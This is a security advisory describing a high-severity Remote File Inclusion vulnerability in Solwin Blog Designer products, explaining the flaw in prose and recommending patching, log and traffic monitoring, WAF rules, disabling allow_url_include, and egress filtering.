A high-severity vulnerability has been identified in multiple Solwin Blog Designer products, including the PRO version. This flaw, known as a Remote File Inclusion (RFI), allows an unauthenticated attacker to trick the server into executing malicious code from an external source, potentially leading to a complete system compromise, data theft, and further network intrusion.

The vulnerability is an Improper Control of Filename for Include/Require Statement in PHP, commonly known as Remote File Inclusion (RFI). This occurs when a PHP script uses a function like include() or require() to load a file whose path is provided via user-supplied input (e.g., a URL parameter) without proper validation. An attacker can exploit this by crafting a request that points to a malicious PHP script hosted on an external server. The vulnerable application will then fetch and execute this remote script, granting the attacker the ability to run arbitrary commands on the server with the permissions of the web server process.

This vulnerability presents a significant risk to the organization, reflected by its High severity rating with a CVSS score of 8.1. Successful exploitation could lead to a complete compromise of the web server, resulting in severe consequences such as the theft of sensitive company or customer data, website defacement, and service disruption. Furthermore, a compromised server could be used as a pivot point to launch attacks against other internal systems or be co-opted into a botnet for malicious activities like distributing malware or launching denial-of-service attacks, causing significant reputational and financial damage.

Immediate Action: The primary and most effective remediation is to apply the security updates provided by the vendor across all affected systems immediately. After patching, it is critical to review web server access and error logs for any signs of exploitation attempts that may have occurred prior to the update.

Proactive Monitoring: Security teams should actively monitor for indicators of compromise. This includes scrutinizing web server logs for suspicious GET or POST requests containing full URLs (e.g., http://, https://, ftp://) in parameters. Monitor network traffic for unusual outbound connections from the web server to unknown IP addresses, which could indicate the server is attempting to fetch a remote malicious file. Implement file integrity monitoring on the web application's directories to detect the creation of unexpected files (e.g., web shells).

Compensating Controls: If immediate patching is not feasible, implement the following controls to mitigate risk:

• Deploy a Web Application Firewall (WAF) with rules specifically designed to detect and block RFI attack patterns.
• On the server, modify the php.ini configuration file to set allow_url_include to Off. This is a critical server-level hardening step that prevents PHP from including remote files via URL.
• Implement strict egress filtering rules on the network firewall to block the web server from initiating outbound connections to the internet, except to explicitly trusted hosts.

Public Exploit Available: false

Given the high CVSS score of 8.1 and the critical impact of a successful Remote File Inclusion attack (i.e., remote code execution), this vulnerability should be treated with the highest priority. We strongly recommend that organizations identify all instances of the affected Solwin Blog Designer products and apply the vendor-supplied patches immediately. While this CVE is not currently listed on the CISA KEV list, its severity warrants urgent attention to prevent potential server compromise and subsequent data breaches.